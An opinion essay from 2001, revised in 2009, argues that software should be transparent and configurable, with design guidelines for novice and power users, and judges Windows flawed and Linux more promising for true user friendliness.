User friendliness is come to mean the aggregation and integration of multiple functionalities into single monolithic all powerful programs. This is one of the great myths of personal computing. There have never been any programs that make things all powerful, and integrated at the same time, which have also been extremely powerful, safe and easy to use. Perceptions of user friendliness have always been at loggerheads for deciding which functionalities to include into a single program. Making a single huge program will also mean providing a lot of configuration options, which is considered not to be user-friendly. Hence given the functionality in a integrated program, there are inevitably a number of ways to do all of it better with smaller more focused programs. This has indeed spawned a new industry offering tweaks and hacks into known software to extend and increase functionality. Integration is newbie friendly and seasoned unfriendly.

A by-product of user friendliness coupled with the closed software model has stressed on hiding the internals of the software from the user. This is evidently to protect the user from the program, and make sure that he is not intimidated by the software in any way. In fact it is more to hide the shoddy work of the programmer, hide all flaws under the hood, keep the user uninformed and keep that poor idiot permanently dependant on the service department and new product updates.

One really absurd interpretation of user friendliness is perceived to be lack of information on what the programming =is doing at a time. It is considered to the program to apparently freeze up rather than give information on what it is trying to accomplish. On the contrary what user friendly software should do is to keep the user informed about what it is achieving. Normally the user would ignore all that information. But this becomes absolutely invaluable in times of errors. Any such information would be very useful in diagnosing faults, and for first aid. With the programs denying the user such knowledge he is bound to the support and service for salvation.

One final measure of user friendliness is the lack if information about how the program works. Modern OSes provide a number of ways of achieving the same objective. The absolute lack of technical information in the help, and limiting help files to "click here" information is hardly friendly. It may be argued that such information is not newbie friendly. Depends on the capabilities of the newbie really, and what is achieved by not including it at all. A real I-dont-care-a-damn newbie will never look into it anyway, even if it were included. But not including it actually makes the program unfriendly as it would take away crucial information about the fitness of purpose of the software.


Evaluation of the need

Ask any layman who uses computers about what he believes to be the most important requirement of a computer system. More often than not he will come up with the cliched user-friendliness. But should it? In other words why should computer systems be user friendly?

This may seem blasphemy to all but hear me out. The fashionable thing to do today is to make things user friendly, this has, on one hand, led to the development of the click and do interfaces. It has also, on the other hand, led to the excommunication of geek-speak from products of computer science. I need to dwell upon this for a little perspective on the path my reasoning is going to follow.

Through out man's history we have seen a number of sciences grow and develop. Without fail we have seen each science develop its own language. Practitioners say it allows easy and quick communication. Sceptics say this is to protect the practitioners of the science for the laymen. No matter what the reason, the fact remains that this particular stream of computer science is being denied of use of its own language from its own products.

The point is simple. Computer science is just another stream of science. Practicing it needs just the same amount of learning and preparation that any other stream of science needs. And just because it has the ability to reach the masses should not take away from the fact that it needs the respect that any other branch of engineering gets. Its ease of use should not be held against it.

To take complete advantage of this argument it is necessary, like in any other branch of engineering to identify the various components of the user populace. We shall split the user populace into two categories. The first we shall call the "dummies", after the famous set of user manuals that flooded the market. These are users who are primarily concerned with not the product, but only what it does for them. These users are the ones who should be given the whole "ease of use benefit". The titles that these users use are primarily the end user software like the word processor, spread sheets, multimedia applications, browsing and P2P applications. This will also include the large quantity of applications for other fields of study. All software that is used for data processing by members of other branches of science, engineering and even art come into this category. This therefore forms not only the biggest segment, it also is the most elastic and responsive to the user-friendliness of software.

Unlike common perceptions this will also be the toughest segment to program for. Instead of the sorry software of today that is sold to this segment, there should be more really user friendliness built in. There needs to be a lot of improvement in the software, which actually means not following the present norms. The following is a set of guidelines for the kind of software that is expected to meet the needs of the dummies.

  • Software must be focused, and accomplish more with little effort, especially when it comes to engineering applications
  • The software must make things transparent to the user, as far as the actual implementation of the various options in the program goes. It is not necessary or desirable for the software to prevent the user from being able to do things differently, in a way he desires. One such idea is preventing
  • The software must keep the user in the loop, communication to the user through visual and audio signals denoting the function performed. The signals should be subtle enough to ignore. For example the status bar is a great place to give a lot of information on what the program is performing.
  • While it may be required to keep the initial configuration of the program simple, no attempt must be made to reduce the option set available to the user. Advance configuration options are a must.
  • Rather than keep the interface standard, stress should be on keeping the interface simple, uncluttered and intuitive.
  • Documentation is important. Just like it is desirable to keep the configuration simple, without reducing the available options, advanced information and advanced implementation should be discussed. Any issues that may be faced by the users must be documented. If a known bug exists, it should be listed. Any warnings to the user must be explicit and easy to understand.
  • The user must forever be in control of his own machine. Rather than annoying OK pop ups, more desirable is to provide logs, keep track of changes performed and give the advanced user power to see and undo any changes made to the system.

Then we have the "power-users". These are the users who are either directly related to the branch of Computer Science, or those who are well versed with the usage of software. The kind of software this segment will be using will be the high end server level software, like web servers, SQL servers etc. This will also include those from the dummies who have gained an insight into the working of their own software and are willing to experiment and learn more. This is a set of guidelines for this kind of software.

  • These users are not newbies and should not be assumed to be the lowest rung of the use populace. The interfaces should be designed using common configuration themes
  • Administration should necessarily be centralized and be powerful and flexible.
  • Information should never be hidden from these users. Configuration options should never be limited to a few option sheets. It is strongly advised to follow the configuration file method of setting options. The Administration console may be a front end for a limited set of options. If the console can list all the options it is welcome, but none should be dropped because of lack of space.
  • Alternate methods for similar tasks may be optional but no attempt must be made to make it transparent. The user should have the power to choose.
  • Documentation should be complete, easily accessible and also include relevant technical and implementation information.
  • Log files are a necessity and so are front end analyzers for those log files
  • The administrator should for ever be in control of the machine, under all circumstances

Having defined what we expect from the software, we shall answer the first question, why should computer systems be user friendly?

The only reason computer systems should be user-friendly is to perform their intended function, for the intended audience. True programs are written by correctly identifying the intended audience, and the function is equal proportion. No user-friendly software can be called such if it chooses to ignore one of these two aspects. No concept of friendliness makes sense without both these variables defined, user-friendliness does not exist in vacuum.


Windows and Linux

Based on the discussion above, how do Linux and Windows measure up as Working environments. We shall look at the two environments, one supposedly user friendly and the other user unfriendly. We shall then dispel some myths and then evaluate their positions on the same.

Windows enjoys the position of power in the personal computer segment. This has been to a great extent due to its early mover advantage. Also the perception that Windows is user-friendly had a very important role in this. But how did Windows approach user-friendliness. And is this approach justified?

Windows assumed all of it users to be a bunch of morons. To give credit, it assumed that all it users are those that do not want to spend time at all to spend on trying to know the system that they were using. This may be true to an extent but it sure is a flawed. Although Microsoft has become the biggest player in the PC segment, it sure has lost out on the more advanced markets like say the server segment.

Microsoft through Windows has been highly user focused. All of its decisions have been end user focused. And this end user has been the common man, one who does not want to learn about the tools that he uses. This is brilliant when it comes to marketing strategy, but is bad strategy for building software. They say that the problem with Apple has been that it hired engineers to do marketing. The problem with Microsoft has been the fact that it hired marketing guys to do the development. That is in a few words it. That is the reason for a decent user interface, not no intuitive layout and pathetic functionality. In its desperation for user acceptance it forgot the part that a software is defined by its functionality as well. So we have software that is highly conforming to the standards that it had set about user-friendliness, the functionality has been sacrificed. It is possible to rant about it, but a quick look at the reasons for Microsoft bashing does suggest this thing.

Also Microsoft's focus has been on the simplicity of the interface, that all their products are known for. So what does Microsoft gain by this. By making a simple uniform interface, it prevents product differentiation. It prevents people from differentiating between competing products, giving the choice of these products back to the developers of the OS itself, that is Microsoft.

So is this software user-friendly. According to our definition it is not, it is flawed. The software may be newbie friendly but it sure is not complete user-friendly software. Because it does not give the function of the software enough say in deciding the design of the software itself.

What about Linux. This can be viewed as two things. First Linux with its Unix roots, as a server application. And then it its new avatar of a desktop alternative.

Unix, has been the most powerful and widely used OS in the past. It is incredibly stable and powerful. As many testimonies will prove. But it had absolutely nothing to show for user friendliness. To use Unix one had to undergo a vast learning curve. This obviously gave it absolutely low newbie friendliness. But on the other hand it did have a lot to show for the friendliness with the focus on functionality, and power of use.

But things are changing with the new focus. Linux is with a new focus now. Under the new focus of desktop users it has developed a number of things. Linux has the most powerful and easy to use Windows Managers. It had graphical front ends for all the products that a simple user wants. It also has easy to use products for all kinds of users. What are described as products which are notoriously difficult, are actually intuitive. And then come with a tremendous amount of documentation.

Linux is special in the fact that it has products for all the levels of users. And it has no barricades against getting more information yourself. Information is the most important thing in a Linux system. All the supposedly cryptic commands are not for the everyday users. And then how can one use that to dismiss Linux as a desktop alternative. Linux it more than a desktop alternative alone, it is a server which can be more friendly than a Desktop OS.

So is Linux user-friendly. Not really. It does lack in most of the easy to use interfaces. It sure is newbie unfriendly. But the point to note is the focus. It is just not on either the program or the user. It is on both. Hence in the long run it is Linux alone that can have any truly user-friendly programs. If I were a punter, I would put my money on the Linux horse. It may be slow now, but it will only get faster.

Document Changes
September 11, 2001: Initial publishing of the article.
April 02, 2009: Spell check and cosmetic changes.